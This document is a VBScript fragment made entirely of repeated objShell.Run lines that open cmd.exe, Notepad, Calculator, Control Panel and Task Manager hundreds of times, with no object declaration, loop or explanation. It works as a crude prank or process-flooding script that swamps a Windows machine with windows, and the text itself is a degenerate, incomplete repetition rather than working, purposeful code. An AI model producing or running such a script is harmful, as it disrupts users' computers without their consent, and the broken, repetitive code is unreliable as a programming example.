objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
